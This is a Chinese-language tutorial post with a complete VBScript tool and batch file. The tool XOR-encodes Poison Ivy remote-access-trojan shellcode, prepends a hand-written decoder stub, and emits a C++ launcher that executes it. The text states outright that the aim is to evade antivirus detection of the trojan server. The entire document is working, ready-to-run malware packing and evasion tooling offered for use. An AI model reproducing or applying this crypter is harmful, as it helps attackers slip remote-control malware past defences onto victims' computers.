Poison Ivy配置服务端可以生成不同格式的Shellcode,对Shellcode进行异或加密可以使生成的服务端逃过一些国产杀毒软件的查杀。下面的工具可以将Poison Ivy生成的二进制Shellcode(.bin文件)转换成可直接编译的.cpp文件。实验环境为XP + VC++6.0。
shellcode.vbs
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if
if Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If
'10进制转16进制函数
Function Dec2Hex(Dec)
Dec2Hex = ""
Do While Dec > 0
a = CStr(Dec Mod 16)
Select Case a
Case "10": a = "A"
Case "11": a = "B"
Case "12": a = "C"
Case "13": a = "D"
Case "14": a = "E"
Case "15": a = "F"
End Select
Dec2Hex = a & Dec2Hex
Dec = Dec \ 16
Loop
End Function
'读取二进制文件函数
Function ReadGif(sStr)
Dim i, iHex, sPath, oStream
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1
oStream.Open
oStream.LoadFromFile sStr
For i = 1 To LenB(oStream.Read())
oStream.Position = 0
iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
If Len(iHex) = 1 Then iHex = "0" & iHex
ReadGif = ReadGif & iHex
Next
oStream.Close
Set oStream = Nothing
End Function
'把代码分块输出函数
Function CutAndJoin(sSource, iLong, sJoiner)
Dim I, N
N = Len(sSource) / iLong
If(N <> Fix(N))Then N = Fix(N) + 1
For I = 0 To N - 1
CutAndJoin = CutAndJoin & Mid(sSource, I * iLong + 1, iLong) & sJoiner
Next
If(N > 0)Then CutAndJoin = Left(CutAndJoin, Len(CutAndJoin) - Len(sJoiner))
End Function
Set Arg=Wscript.Arguments
tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"\x")
shellcode=Split(tempshellccode,"\x")
For i=1 To UBound(shellcode)
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"
vbshellcode=vbshellcode&"\x"&temp
Next
decode="\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x34\x21\x80\x34\x0A\x"&arg(1)&"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
decode=decode&LCase(vbshellcode)
WScript.Echo CutAndJoin(decode, 80, Chr(13)) '80正好是4的倍数,这样排列好看一些
Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)
.writeline "#include<windows.h>"
.writeline "#pragma comment(linker, "&Chr(34)&"/OPT:NOWIN98"&Chr(34)&")"
.writeline "#pragma comment(linker, "&Chr(34)&"/subsystem:\"&Chr(34)&"windows\"&Chr(34)&" /entry:\"&Chr(34)&"mainCRTStartup\"&Chr(34)&""&Chr(34)&" )"
.writeline "#pragma comment(linker, "&Chr(34)&"/MERGE:.rdata=.text"&Chr(34)&")"
.writeline "char ShellCode[]="
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
.writeline "{"
.writeline " ( (void(*)(void)) &ShellCode)();"
.writeline "return 0;"
.writeline "}"
.close
End with
Set fso = Nothing
End Function
writef(arg(2))
Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function
If Findfile(arg(2))=True then
wsh.echo "已生成"&arg(2)&"的c语言格式文件"
End if
function usage()
wscript.echo "+---------- ^^ shellcode xor for Poison Ivy 2.3.2 vbscript----------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage: |"
wscript.echo "| cscript.exe shellcode.vbs x.bin xorhexnum test.cpp |"
wscript.echo "|ex: |"
wscript.echo "| cscript.exe shellcode.vbs c:\PoisonIvy.bin 21 c:\test.cpp |"
wscript.echo "+-------------------------------------------------------------------+"&chr(10)
end function
shellcode.bat
cscript.exe shellcode.vbs c:\PoisonIvy.bin 85 c:\PoisonIvy.cpp
shellcode.bat和shellcode.vbs放在同一目录中,编辑shellcode.bat可以设置.bin文件和.cpp文件的目录,中间的数字为异或值。
